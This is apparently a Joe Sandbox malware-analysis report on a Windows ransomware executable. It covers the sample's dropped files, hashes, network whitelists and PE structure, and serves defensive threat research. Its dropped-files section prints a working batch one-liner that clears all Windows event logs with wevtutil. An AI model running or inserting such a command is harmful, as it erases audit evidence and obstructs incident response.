                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                  Number of analysed new started processes analysed:35
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • HDC enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Detection:MAL
                                                                  Classification:mal84.rans.expl.evad.winEXE@34/14@0/100
                                                                  EGA Information:Failed
                                                                  HDC Information:
                                                                  • Successful, ratio: 0.9% (good quality ratio 0.9%)
                                                                  • Quality average: 67.9%
                                                                  • Quality standard deviation: 17.7%
                                                                  HCA Information:Failed
                                                                  Cookbook Comments:
                                                                  • Adjust boot time
                                                                  • Enable AMSI
                                                                  • Found application associated with file extension: .exe
                                                                  Warnings:
                                                                  Show All
                                                                  • Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe
                                                                  • Excluded IPs from analysis (whitelisted): 52.255.188.83, 104.42.151.234, 20.50.102.62, 96.16.108.70, 2.20.142.209, 2.20.143.16, 20.54.26.129, 92.122.213.247, 92.122.213.194, 20.82.210.154
                                                                  • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, fs.microsoft.com, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, skypedataprdcolwus16.cloudapp.net, au-bg-shim.trafficmanager.net
                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                  • Report size getting too big, too many NtDeviceIoControlFile calls found.

                                                                  Simulations

                                                                  Behavior and APIs

                                                                  TimeTypeDescription
                                                                  13:00:02API Interceptor86x Sleep call for process: 3PSo7GcHhV.exe modified
                                                                  13:00:22API Interceptor2x Sleep call for process: svchost.exe modified
                                                                  13:01:37API Interceptor1x Sleep call for process: MpCmdRun.exe modified

                                                                  Joe Sandbox View / Context

                                                                  IPs

                                                                  No context

                                                                  Domains

                                                                  No context

                                                                  ASN

                                                                  No context

                                                                  JA3 Fingerprints

                                                                  No context

                                                                  Dropped Files

                                                                  No context

                                                                  Created / dropped Files

                                                                  C:\ProgramData\Microsoft\Network\Downloader\edb.log
                                                                  Process:C:\Windows\System32\svchost.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):4096
                                                                  Entropy (8bit):0.5920123883102051
                                                                  Encrypted:false
                                                                  SSDEEP:6:0FYdk1GaD0JOCEfMuaaD0JOCEfMKQmDlAl/gz2cE0fMbhEZolrRSQ2hyYIIT:0lGaD0JcaaD0JwQQlAg/0bjSQJ
                                                                  MD5:07B42C7EE8D68E637D120F24BBA33315
                                                                  SHA1:F05FB73D05F26959B014C5271AA5501F73E54280
                                                                  SHA-256:CC5D16CBC3AE5C327D438A361CD6718BD862CB4B3AB85FCFB4CBDA6B65B29E35
                                                                  SHA-512:A0119EF00A90A5A9C6E50B3182075291110D1D1297B85E8ABF88AF56474381BF9D679AA8AAB7E140C9D4177701A4F13123252F4F8A8272ACF2150ECC7C2305C0
                                                                  Malicious:false
                                                                  Preview: ......:{..(..........y).............. ..1C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@........................y)...........&......e.f.3...w.......................3...w..................h..C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b...G............................................................................................................................................................................................................
                                                                  C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
                                                                  Process:C:\Windows\System32\svchost.exe
                                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0x4040029b, page size 16384, DirtyShutdown, Windows version 10.0
                                                                  Category:dropped
                                                                  Size (bytes):32768
                                                                  Entropy (8bit):0.09345316872156381
                                                                  Encrypted:false
                                                                  SSDEEP:6:m9Gzwl/+K5c8RIE11Y8TRXflyIKc9Gzwl/+K5c8RIE11Y8TRXflyIK:SG0+IO4blflHK8G0+IO4blflHK
                                                                  MD5:3DA7BD9E0B68DD41E044A1648F057EE1
                                                                  SHA1:444EA60A8DF5C926B8F444A38EE82320FB9E1ED7
                                                                  SHA-256:E5ABF44210D6B93263F3DA87B1D0DB602839A526C683D4D38DD6444E034C6C7F
                                                                  SHA-512:72CEF9777EB18538FDD63618BE3459CFEA7FB27C3477E1D79BFD39655D7975EA59DE2195DA60048782D67B5FE60C89F3824E5CFAF8282B0CAF78AE255C08A735
                                                                  Malicious:false
                                                                  Preview: @@..... ................e.f.3...w........................&..........w.......y).h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w.........................................................................................................................................................................................................................................W.....y.k...................n.....y..........................................................................................................................................................................................................................................................................................................................................................................................
                                                                  C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
                                                                  Process:C:\Windows\System32\svchost.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):8192
                                                                  Entropy (8bit):0.10855194384116401
                                                                  Encrypted:false
                                                                  SSDEEP:3:NC/9EvzScMAxXl/bJdAtivyj/tall:NCAm8Jt4Uyc
                                                                  MD5:35283FD318C9C29B3FB6699DDD97E8F4
                                                                  SHA1:FDB29381C7E672B18DA40B51B932442D1767E2A7
                                                                  SHA-256:9DE106B5DAE597418818A15E72BF29E59E059D530450F4060D9261BF9434F49E
                                                                  SHA-512:BD594CB2C450A2AC738C7814CAED6FCBA97A101C7AF5C5F120533DCA937987CF1C229EB24060D96546B7C1F72224A78AC1D6030EB6306DD3DA9C8E4695D4F677
                                                                  Malicious:false
                                                                  Preview: .B......................................3...w.......y.......w...............w.......w....:O.....w.....................n.....y..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  C:\ProgramData\dat\hds
                                                                  Process:C:\Users\user\Desktop\3PSo7GcHhV.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):20
                                                                  Entropy (8bit):4.021928094887362
                                                                  Encrypted:false
                                                                  SSDEEP:3:Otym3Uvz:dVz
                                                                  MD5:B61F1BA6831BC32291726CD198791986
                                                                  SHA1:AA651DE1B2D791D217E7CA5DF6DD927D1044526E
                                                                  SHA-256:CA598ED2C49796BB411574E89C61827631AD96E7C16AFFAE118F6A45ADDFCD09
                                                                  SHA-512:C6EC0385B614B20DCF2AD760CDA6ECAEF9829294B7209CBCA8C4F4A1BF3817BA24286EF499053A76DC1A1ACEE57214DBA364E380B3756D5C8E12C442D7964C87
                                                                  Malicious:false
                                                                  Preview: ICKHWwa6D3kpIRqSa6X4
                                                                  C:\ProgramData\dat\runs.txt
                                                                  Process:C:\Users\user\Desktop\3PSo7GcHhV.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):6
                                                                  Entropy (8bit):1.7924812503605778
                                                                  Encrypted:false
                                                                  SSDEEP:3:un:un
                                                                  MD5:7493D8CBB0315336E669479DE9481BF9
                                                                  SHA1:4E552AD713849F7588B307A2F1BCE31B31B7C568
                                                                  SHA-256:045467A8279ABDF2244F3E8CBBA37B7C7E1ECA18AAB2B830FF45C0987C7BEBFC
                                                                  SHA-512:57D8700AF2E1C85D115BD5C44DDC6E603F2474DB350F1EBC6D31B2D9C500AEC3CB4119C92858458757D89C05F650D3F503878397A90DFF3762CACD7F3E02AD55
                                                                  Malicious:false
                                                                  Preview: ....{.
                                                                  C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl
                                                                  Process:C:\Windows\System32\svchost.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):65536
                                                                  Entropy (8bit):0.11006655920176958
                                                                  Encrypted:false
                                                                  SSDEEP:12:260EXm/Ey6q9995hiFBq3qQ10nMCldimE8eawHjcs5:260Nl68njLyMCldzE9BHjcC
                                                                  MD5:77F9CA6220654DDDA889146C767EF584
                                                                  SHA1:6290A3ADB795E7C1B662DE29B53E1B3DD40660DE
                                                                  SHA-256:7ECCAC9BBB2D9819FDF3083E9D54717899F8A372762718F3F0E34ABCB81DC5AF
                                                                  SHA-512:543CAC22AD7ECC842DB75949B203E0E9E8644E970C64C1F600BEDBD98311EC5B9BA882CFC97E2685D7767E3CF6BFB8D827CA81CD88162772828569A12FE0000C
                                                                  Malicious:false
                                                                  Preview: ................................................................................0...l...........................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1............................................................b.0..... ......NJ..S..........S.y.n.c.V.e.r.b.o.s.e...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.S.y.n.c.V.e.r.b.o.s.e...e.t.l...........P.P.0...l...d.......................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl
                                                                  Process:C:\Windows\System32\svchost.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):65536
                                                                  Entropy (8bit):0.11249791797394404
                                                                  Encrypted:false
                                                                  SSDEEP:12:oSlXm/Ey6q9995hiCg1miM3qQ10nMCldimE8eawHza1miIMUF:oSIl68ni1tMLyMCldzE9BHza1tI9F
                                                                  MD5:060D24E9AFC2033D18A1E288BC1DBB8C
                                                                  SHA1:C77FF7EB66C8D5E9D4BE0F4F41B0EE48F2CD7F97
                                                                  SHA-256:BC664EBFF432D7D2B29E6CC3D2008C8C580CAE6731051C718F0674DD94387805
                                                                  SHA-512:E3477C76824D566486A919D1A57F1159CDEE2255A95679795719545C79DEF746BDCD4295AD6EDC4C674D2B555EBD1C7F5F94A02999DDA725C205A9E9D4DE1D23
                                                                  Malicious:false
                                                                  Preview: ................................................................................0...l....!.......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1............................................................b.0..... ......'C..S..........U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...e.t.l.......P.P.0...l....)......................................................................................................................................................................................................................................................................................................................................................................................
                                                                  C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl
                                                                  Process:C:\Windows\System32\svchost.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):65536
                                                                  Entropy (8bit):0.11219590356531134
                                                                  Encrypted:false
                                                                  SSDEEP:12:o+TXm/Ey6q9995hiL1mK2P3qQ10nMCldimE8eawHza1mKe:o+Kl68n+1iPLyMCldzE9BHza1C
                                                                  MD5:3751170B265395CEE54B59614FFD41F7
                                                                  SHA1:5FB8E17AC1752F8A7AD5038E3B60B4DEBF48C032
                                                                  SHA-256:FAE2693739784702BC2B51A47986F744B4310CF7562A9174A9467EF024755222
                                                                  SHA-512:BF53A04BC25519B4E15342F37E10A12CB4F20146243BB333B8A950470D0F07D4EFE35056EB6B6E1BE63D3E80A6FC3D5E884AA866904CC22FD51F8AD1F23FC33D
                                                                  Malicious:false
                                                                  Preview: ................................................................................0...l............................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1............................................................b.0..... .......9..S..........U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...e.t.l.......P.P.0...l...i.......................................................................................................................................................................................................................................................................................................................................................................................
                                                                  C:\Users\user\Desktop\msvsc.dll
                                                                  Process:C:\Users\user\Desktop\3PSo7GcHhV.exe
                                                                  File Type:data
                                                                  Category:modified
                                                                  Size (bytes):226
                                                                  Entropy (8bit):3.067867937286734
                                                                  Encrypted:false
                                                                  SSDEEP:6:kpldWl3EZ0Oi3DAlrmoncSlJKJmoncKlLDMlsCl:Kl83gAcJRrlJKJRzlLQ7
                                                                  MD5:4E1843094EE93FB323F508E0B2F563DD
                                                                  SHA1:EF56FFE9F245459123B89BBD71296ADA79F25C9E
                                                                  SHA-256:F505972F8F27BACBB9020B62EA7F68BB4BB9A7D3554B5128D3683AA5627A0B3C
                                                                  SHA-512:21E11E76A40E34BFE865456E7F8EE0E67F12933609136AD85728EA293D68149E3F4D8EB52425D431021E938B9A8F29D1036622D5455679413A8321B4530E8E02
                                                                  Malicious:false
                                                                  Preview: -.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....I.C.K.H.W.w.a.6.D.3.k.p.I.R.q.S.a.6.X.4.....s.t.a.r.t.e.d. .n.e.t. .s.c.a.n.....f.i.n.i.s.h.e.d. .n.e.t. .s.c.a.n.....r.e.s.t.a.r.t.i.n.g. .a.s. .s.y.s.t.e.m.
                                                                  C:\Users\user\Desktop\netframwork.dll
                                                                  Process:C:\Users\user\Desktop\3PSo7GcHhV.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):212
                                                                  Entropy (8bit):3.131609373667538
                                                                  Encrypted:false
                                                                  SSDEEP:3:ielyplTlzWlKsl+5H01eNnPd1+GaMlWlFdep1hlTc41lr5F4ElDv49:kpldWl3EZ0cgGaMlWlmp1hq41pbJRO
                                                                  MD5:A423B7486D92B84E2E11220C280D543C
                                                                  SHA1:7591E284E5645BD9488C10D7908F133A8C7A9137
                                                                  SHA-256:CC1B472FC9F2E53F89C1BA2C6F493365A5E4D2C2DEB5E781AF1E4503048355AC
                                                                  SHA-512:FDB30433E35F985DE3E668E7D00809E8866880AF90CB48E339A32A2B2DA8FA9082C0EA3004ED4AEBDD8CB97C76204057B13DE643EAF3791BA258081E6B377C6B
                                                                  Malicious:false
                                                                  Preview: -.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....I.C.K.H.W.w.a.6.D.3.k.p.I.R.q.S.a.6.X.4.....a.n.t.o.h.e.r. .p.r.o.c.e.s.s. .i.s. .a.l.r.e.a.d.y. .r.u.n.n.i.n.g.,. .t.h.e.r.m.i.n.a.t.i.n.g.....
                                                                  C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                                                  Process:C:\Windows\System32\svchost.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):55
                                                                  Entropy (8bit):4.306461250274409
                                                                  Encrypted:false
                                                                  SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                  MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                  SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                  SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                  SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                  Malicious:false
                                                                  Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                  C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log
                                                                  Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                  File Type:data
                                                                  Category:modified
                                                                  Size (bytes):906
                                                                  Entropy (8bit):3.147581746815087
                                                                  Encrypted:false
                                                                  SSDEEP:12:58KRBubdpkoF1AG3r/H0ZywZk9+MlWlLehB4yAq7ejCqH0ZyQI:OaqdmuF3rsM3+kWReH4yJ7MkMt
                                                                  MD5:C4344B16E4F66D0BF17D298492AA8D7A
                                                                  SHA1:E02DE38B1012A867F4D9DF386034E7AF7BC3B738
                                                                  SHA-256:5A6C0CC434EF72549FF2D143574AE41265CD16ED8A96025E7086BACF6E48E34D
                                                                  SHA-512:9A9616813A96AEE05C3483CE2E6F9B057BCC1F173C00EBDFCBBFC3902679F33F924CD6486A7C28DAA047083224C2F96C8C4625A8A89800B2EFC4FDC54471742D
                                                                  Malicious:false
                                                                  Preview: ........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. F.r.i. .. M.a.y. .. 2.8. .. 2.0.2.1. .1.3.:.0.1.:.3.7.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. F.r.i. .. M.a.y. .. 2.8. .. 2.0.2.1. .1.3.:.0.1.:.3.7.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....
                                                                  C:\Windows\logg.bat
                                                                  Process:C:\Users\user\Desktop\3PSo7GcHhV.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):71
                                                                  Entropy (8bit):4.411943204219414
                                                                  Encrypted:false
                                                                  SSDEEP:3:QwZYvFqeNCzvFN6JCT2RMFN85iM:QEcBQWJ58M
                                                                  MD5:DA3A9F2B2D2F3364662B9AAF6E201EBD
                                                                  SHA1:77FF459F97D237F9D2B3A67D49029B82FBCE90E4
                                                                  SHA-256:C0850685E4D855A0D5E5753914627F0CA0D2DD69B89893C2F73542BD0F70D163
                                                                  SHA-512:740309A6F903A396E14707FB82449A535252D041184F3CC2AA8428E428487C6C86C4FAE73D83EEBC599BCD198978E73F057EDCD60D3C8AC772256C382F86CF6F
                                                                  Malicious:false
                                                                  Preview: for /F "tokens = *" %%G in ('wevtutil.exe el') DO (wevtutil.exe cl %%G)
                                                                  \Device\ConDrv
                                                                  Process:C:\Users\user\Desktop\3PSo7GcHhV.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):54
                                                                  Entropy (8bit):3.8540504111617246
                                                                  Encrypted:false
                                                                  SSDEEP:3:RC8PjNAPKmWAKVHJn:RPPjNEWvVp
                                                                  MD5:0BF33F8527A2A575E4666A9FB1B8B481
                                                                  SHA1:0386ABCEB5A0A8A92F2BAEDF09048357F75AFE31
                                                                  SHA-256:01CAEB100922BC401EAF47BFA287FDD9E117E7BB3107D0C70A8A8E5288CD9FE1
                                                                  SHA-512:E6DC5D2321B740B2DD6D58B9EE7E0281BEA9058F0DB5D99B005C1A5808863750222DC767A96B835100C59E6D15E3F544BB0530140E4FDA6DDF94D1C7FDAC138B
                                                                  Malicious:false
                                                                  Preview: running after 5 seconds, close proccess for cancelling

                                                                  Static File Info

                                                                  General

                                                                  File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                  Entropy (8bit):6.607234868715584
                                                                  TrID:
                                                                  • Win32 Executable (generic) a (10002005/4) 99.94%
                                                                  • Clipper DOS Executable (2020/12) 0.02%
                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                  File name:3PSo7GcHhV.exe
                                                                  File size:914944
                                                                  MD5:8856669b9a76eeb19e5673db6c4491ab
                                                                  SHA1:2d328721640ebb3ddeb971316141fd2b3a84ae84
                                                                  SHA256:edf9912bf2c8c7d9048bc6322900231810de7cc34267acc12e1a256fbecdbbdf
                                                                  SHA512:96af5e42d4aab9ffbe10f4db0e2811d7e00ceebed7ed52b8e679164a92011bfa8eb7c33864be3b3e92358ba3b30ba87bab25cde9ee9163b325a7b542eea621e3
                                                                  SSDEEP:12288:CK/vO60oHHTJe4mgfoTZRiNayWOfX9J0f8BL2sUS9ROKioOR1y/KIFHS:v/WJaJig8iaaNJ0fESS98loo1+FH
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................................EX...,..Rich.,.

                                                                  File Icon

                                                                  Icon Hash:00828e8e8686b000

                                                                  Static PE Info

                                                                  General

                                                                  Entrypoint:0x458140
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows cui
                                                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                  DLL Characteristics:GUARD_CF, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                  Time Stamp:0x606E8104 [Thu Apr 8 04:05:24 2021 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:6
                                                                  OS Version Minor:0
                                                                  File Version Major:6
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:6
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:5fffe4c149255775a4c13ec33581201f

                                                                  Entrypoint Preview

                                                                  Instruction
                                                                  call 00007FB120FB49F3h
                                                                  jmp 00007FB120FB418Eh
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  push ecx
                                                                  lea ecx, dword ptr [esp+04h]
                                                                  sub ecx, eax
                                                                  sbb eax, eax
                                                                  not eax
                                                                  and ecx, eax
                                                                  mov eax, esp
                                                                  and eax, FFFFF000h
                                                                  cmp ecx, eax
                                                                  jc 00007FB120FB432Eh
                                                                  mov eax, ecx
                                                                  pop ecx
                                                                  xchg eax, esp
                                                                  mov eax, dword ptr [eax]
                                                                  mov dword ptr [esp], eax
                                                                  ret
                                                                  sub eax, 00001000h
                                                                  test dword ptr [eax], eax
                                                                  jmp 00007FB120FB4309h
                                                                  mov ecx, dword ptr [ebp-0Ch]
                                                                  mov dword ptr fs:[00000000h], ecx
                                                                  pop ecx
                                                                  pop edi
                                                                  pop edi
                                                                  pop esi
                                                                  pop ebx
                                                                  mov esp, ebp
                                                                  pop ebp
                                                                  push ecx
                                                                  ret
                                                                  mov ecx, dword ptr [ebp-10h]
                                                                  xor ecx, ebp
                                                                  call 00007FB120FB37ECh
                                                                  jmp 00007FB120FB4300h
                                                                  push eax
                                                                  push dword ptr fs:[00000000h]
                                                                  lea eax, dword ptr [esp+0Ch]
                                                                  sub esp, dword ptr [esp+0Ch]
                                                                  push ebx
                                                                  push esi
                                                                  push edi
                                                                  mov dword ptr [eax], ebp
                                                                  mov ebp, eax
                                                                  mov eax, dword ptr [0049F074h]
                                                                  xor eax, ebp
                                                                  push eax
                                                                  push dword ptr [ebp-04h]
                                                                  mov dword ptr [ebp-04h], FFFFFFFFh
                                                                  lea eax, dword ptr [ebp-0Ch]
                                                                  mov dword ptr fs:[00000000h], eax
                                                                  ret
                                                                  push eax
                                                                  push dword ptr fs:[00000000h]
                                                                  lea eax, dword ptr [esp+0Ch]
                                                                  sub esp, dword ptr [esp+0Ch]
                                                                  push ebx
                                                                  push esi
                                                                  push edi
                                                                  mov dword ptr [eax], ebp
                                                                  mov ebp, eax
                                                                  mov eax, dword ptr [0049F074h]
                                                                  xor eax, ebp
                                                                  push eax
                                                                  mov dword ptr [ebp-10h], eax
                                                                  push dword ptr [ebp-04h]
                                                                  mov dword ptr [ebp-04h], FFFFFFFFh
                                                                  lea eax, dword ptr [ebp-0Ch]
                                                                  mov dword ptr fs:[00000000h], eax

                                                                  Data Directories

                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x9d8880xf0.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xdd0000x1e0.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xde0000x5700.reloc
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x94b700x54.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x94cc00x18.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x94bc80x40.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x7d0000x328.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                  Sections

                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x10000x7ba6a0x7bc00False0.493706597222data6.57842327824IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                  .rdata0x7d0000x21a740x21c00False0.472236689815data5.5406855229IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .data0x9f0000x3d3440x3c000False0.481046549479data6.50319826475IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                  .rsrc0xdd0000x1e00x200False0.53125data4.70823651487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .reloc0xde0000x57000x5800False0.693758877841data6.61368358284IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                  Resources

                                                                  NameRVASizeTypeLanguageCountry
                                                                  RT_MANIFEST0xdd0600x17dXML 1.0 document textEnglishUnited States

                                                                  Imports

                                                                  DLLImport
